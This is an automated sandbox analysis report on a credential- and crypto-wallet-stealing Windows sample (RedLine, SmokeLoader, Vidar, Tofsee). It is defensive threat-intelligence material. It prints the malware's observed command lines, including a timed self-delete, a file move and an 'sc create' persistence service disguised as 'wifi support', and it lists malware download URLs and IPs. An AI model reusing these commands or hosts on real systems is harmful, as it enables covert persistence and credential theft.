Loading ...

Play interactive tourEdit tour

Windows Analysis Report T5dzWoyBkt.exe

Overview

General Information

Sample Name:T5dzWoyBkt.exe
Analysis ID:548650
MD5:f073b540a352759bb44d7a1eb641fe61
SHA1:af036e219b6e7d6551713ad406d816d9f88b4312
SHA256:067e76900265c87d66a44f765bb720bd310e52181badf19efd63f30210f62001
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sigma detected: Suspicious Del in CommandLine
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Connects to a URL shortener service
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 6944 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • T5dzWoyBkt.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\T5dzWoyBkt.exe" MD5: F073B540A352759BB44D7A1EB641FE61)
    • T5dzWoyBkt.exe (PID: 1356 cmdline: "C:\Users\user\Desktop\T5dzWoyBkt.exe" MD5: F073B540A352759BB44D7A1EB641FE61)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • AD19.exe (PID: 5384 cmdline: C:\Users\user\AppData\Local\Temp\AD19.exe MD5: 8C23CC666860658E657DC4652A48FF91)
          • AD19.exe (PID: 2824 cmdline: C:\Users\user\AppData\Local\Temp\AD19.exe MD5: 8C23CC666860658E657DC4652A48FF91)
        • C48A.exe (PID: 6860 cmdline: C:\Users\user\AppData\Local\Temp\C48A.exe MD5: 1F935BFFF0F8128972BC69625E5B2A6C)
          • WerFault.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • DACD.exe (PID: 4616 cmdline: C:\Users\user\AppData\Local\Temp\DACD.exe MD5: 6146E19CEFC8795E7C5743176213B2C2)
          • cmd.exe (PID: 3672 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\DACD.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • timeout.exe (PID: 4792 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • E5F9.exe (PID: 6076 cmdline: C:\Users\user\AppData\Local\Temp\E5F9.exe MD5: E97EA1C4CC3EFE421BC13D3A1FA4D0A3)
          • cmd.exe (PID: 3228 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\bebxnvfo\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4412 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\npcipivi.exe" C:\Windows\SysWOW64\bebxnvfo\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5344 cmdline: C:\Windows\SysWOW64\sc.exe" create bebxnvfo binPath= "C:\Windows\SysWOW64\bebxnvfo\npcipivi.exe /d\"C:\Users\user\AppData\Local\Temp\E5F9.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • EF80.exe (PID: 6920 cmdline: C:\Users\user\AppData\Local\Temp\EF80.exe MD5: 9D7EB9BE3B7F3A023430123BA099B0B0)
          • EF80.exe (PID: 3156 cmdline: C:\Users\user\AppData\Local\Temp\EF80.exe MD5: 9D7EB9BE3B7F3A023430123BA099B0B0)
  • svchost.exe (PID: 7048 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7124 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7152 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5684 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2992 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6324 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6488 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5380 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • eijrgvi (PID: 5344 cmdline: C:\Users\user\AppData\Roaming\eijrgvi MD5: F073B540A352759BB44D7A1EB641FE61)
    • eijrgvi (PID: 4020 cmdline: C:\Users\user\AppData\Roaming\eijrgvi MD5: F073B540A352759BB44D7A1EB641FE61)
  • svchost.exe (PID: 1068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6128 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6860 -ip 6860 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000000.333308223.0000000004DE1000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000E.00000002.400946485.00000000004F0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000028.00000000.450660970.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000028.00000000.456129483.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000028.00000000.451407347.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 14 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              14.2.AD19.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                25.2.EF80.exe.365fb70.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  15.2.eijrgvi.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    12.2.eijrgvi.47a15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      7.1.T5dzWoyBkt.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                        Click to see the 13 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Copying Sensitive Files with Credential DataShow sources
                        Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\npcipivi.exe" C:\Windows\SysWOW64\bebxnvfo\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\npcipivi.exe" C:\Windows\SysWOW64\bebxnvfo\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E5F9.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E5F9.exe, ParentProcessId: 6076, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\npcipivi.exe" C:\Windows\SysWOW64\bebxnvfo\, ProcessId: 4412
                        Sigma detected: Suspicious Del in CommandLineShow sources
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\DACD.exe" & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\DACD.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\DACD.exe, ParentImage: C:\Users\user\AppData\Local\Temp\DACD.exe, ParentProcessId: 4616, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\DACD.exe" & exit, ProcessId: 3672
                        Sigma detected: New Service CreationShow sources
                        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\SysWOW64\sc.exe" create bebxnvfo binPath= "C:\Windows\SysWOW64\bebxnvfo\npcipivi.exe /d\"C:\Users\user\AppData\Local\Temp\E5F9.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\SysWOW64\sc.exe" create bebxnvfo binPath= "C:\Windows\SysWOW64\bebxnvfo\npcipivi.exe /d\"C:\Users\user\AppData\Local\Temp\E5F9.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E5F9.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E5F9.exe, ParentProcessId: 6076, ProcessCommandLine: C:\Windows\SysWOW64\sc.exe" create bebxnvfo binPath= "C:\Windows\SysWOW64\bebxnvfo\npcipivi.exe /d\"C:\Users\user\AppData\Local\Temp\E5F9.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5344

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus detection for URL or domainShow sources
                        Source: http://privacytools-foryou-777.com/downloads/toolspab2.exeAvira URL Cloud: Label: malware
                        Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                        Source: http://data-host-coin-8.com/files/8584_1641133152_551.exeAvira URL Cloud: Label: malware
                        Source: http://data-host-coin-8.com/game.exeAvira URL Cloud: Label: malware
                        Source: http://91.243.44.130/stlr/maps.exeAvira URL Cloud: Label: malware
                        Source: http://data-host-coin-8.com/files/2184_1641247228_8717.exeAvira URL Cloud: Label: malware
                        Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                        Source: http://data-host-coin-8.com/files/6155_1641424911_5543.exeAvira URL Cloud: Label: malware
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: T5dzWoyBkt.exeVirustotal: Detection: 41%Perma Link
                        Multi AV Scanner detection for domain / URLShow sources
                        Source: http://privacytools-foryou-777.com/downloads/toolspab2.exeVirustotal: Detection: 11%Perma Link
                        Source: http://data-host-coin-8.com/files/8584_1641133152_551.exeVirustotal: Detection: 10%Perma Link
                        Source: http://data-host-coin-8.com/game.exeVirustotal: Detection: 7%Perma Link
                        Source: http://91.243.44.130/stlr/maps.exeVirustotal: Detection: 10%Perma Link
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\A9A9.exeReversingLabs: Detection: 46%
                        Source: C:\Users\user\AppData\Local\Temp\B94A.exeMetadefender: Detection: 22%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\B94A.exeReversingLabs: Detection: 89%
                        Source: C:\Users\user\AppData\Local\Temp\C48A.exeMetadefender: Detection: 25%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\C48A.exeReversingLabs: Detection: 78%
                        Source: C:\Users\user\AppData\Local\Temp\CD6F.exeReversingLabs: Detection: 46%
                        Machine Learning detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\C48A.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\npcipivi.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\EF80.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\CD6F.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\DB1C.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\A9A9.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\AD19.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\B94A.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\E5F9.exeJoe Sandbox ML: detected
                        Source: 24.2.E5F9.exe.540e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 22.2.DACD.exe.540e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 7.0.T5dzWoyBkt.exe.400000.1.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                        Source: 7.0.T5dzWoyBkt.exe.400000.3.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                        Source: 7.0.T5dzWoyBkt.exe.400000.2.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                        Source: 22.3.DACD.exe.560000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 7.0.T5dzWoyBkt.exe.400000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                        Source: 24.3.E5F9.exe.580000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 24.2.E5F9.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,22_2_00407510
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,22_2_00407470
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,22_2_00404830
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00407190 CryptUnprotectData,22_2_00407190
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,22_2_004077A0

                        Compliance:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeUnpacked PE file: 22.2.DACD.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\E5F9.exeUnpacked PE file: 24.2.E5F9.exe.400000.0.unpack
                        Source: T5dzWoyBkt.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\AppData\Local\Temp\C48A.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49762 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49797 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.3:49798 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.3:49807 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49810 version: TLS 1.2
                        Source: Binary string: profapi.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: OC:\bowun\yatag\54\hoyosibojekov73\feb\nafixu relusivo\t.pdbh source: AD19.exe, 0000000D.00000000.379556202.0000000000401000.00000020.00020000.sdmp, AD19.exe, 0000000D.00000002.389178268.0000000000401000.00000020.00020000.sdmp, AD19.exe, 0000000E.00000000.384645453.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: fltLib.pdbr source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: sechost.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: C:\malomazasuk.pdbh source: DACD.exe, 00000016.00000000.405871178.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: msvcr100.i386.pdbk source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: !C:\kovarupat-pukuxo59\cibo-rilodiravabut\fiz52-lifasezi-kepi.pdb source: T5dzWoyBkt.exe, 00000001.00000000.282979591.0000000000427000.00000002.00020000.sdmp, T5dzWoyBkt.exe, 00000007.00000000.289865801.0000000000427000.00000002.00020000.sdmp, eijrgvi, 0000000C.00000002.399294738.0000000000427000.00000002.00020000.sdmp
                        Source: Binary string: C:\zeciboj.pdb source: E5F9.exe, 00000018.00000000.410981987.0000000000401000.00000020.00020000.sdmp, E5F9.exe, 00000018.00000002.455837196.0000000000732000.00000004.00000001.sdmp
                        Source: Binary string: C:\bowun\yatag\54\hoyosibojekov73\feb\nafixu relusivo\t.pdb source: AD19.exe, AD19.exe, 0000000D.00000000.379556202.0000000000401000.00000020.00020000.sdmp, AD19.exe, 0000000D.00000002.389178268.0000000000401000.00000020.00020000.sdmp, AD19.exe, 0000000E.00000000.384645453.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: shcore.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: powrprof.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: ?\C:\zeciboj.pdbh source: E5F9.exe, 00000018.00000000.410981987.0000000000401000.00000020.00020000.sdmp, E5F9.exe, 00000018.00000002.455837196.0000000000732000.00000004.00000001.sdmp
                        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: fltLib.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: wwin32u.pdbk source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: VC:\hatisicovapehe\p.pdb source: C48A.exe, 00000013.00000000.402719669.0000000000409000.00000020.00020000.sdmp, C48A.exe, 00000013.00000000.393789417.0000000000401000.00000020.00020000.sdmp, WerFault.exe, 00000017.00000002.450844196.00000000053D0000.00000002.00020000.sdmp
                        Source: Binary string: shell32.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: C:\hatisicovapehe\p.pdb source: C48A.exe, C48A.exe, 00000013.00000000.402719669.0000000000409000.00000020.00020000.sdmp, C48A.exe, 00000013.00000000.393789417.0000000000401000.00000020.00020000.sdmp, WerFault.exe, 00000017.00000002.450844196.00000000053D0000.00000002.00020000.sdmp
                        Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: C:\kovarupat-pukuxo59\cibo-rilodiravabut\fiz52-lifasezi-kepi.pdb source: T5dzWoyBkt.exe, 00000001.00000000.282979591.0000000000427000.00000002.00020000.sdmp, T5dzWoyBkt.exe, 00000007.00000000.289865801.0000000000427000.00000002.00020000.sdmp, eijrgvi, 0000000C.00000002.399294738.0000000000427000.00000002.00020000.sdmp
                        Source: Binary string: wuser32.pdbk source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000017.00000003.408141288.0000000004F89000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: combase.pdb source: WerFault.exe, 00000017.00000003.415140545.00000000053B7000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: C:\malomazasuk.pdb source: DACD.exe, 00000016.00000000.405871178.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AD19.exeCode function: 13_2_00419760 BuildCommDCBAndTimeoutsA,CreateMailslotW,GetNamedPipeHandleStateA,ReleaseSemaphore,FindAtomA,TzSpecificLocalTimeToSystemTime,GlobalHandle,SetConsoleCursorInfo,TlsSetValue,CopyFileW,GetLongPathNameA,SetVolumeMountPointA,GetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExA,13_2_00419760
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,22_2_00405E40
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,22_2_00401280
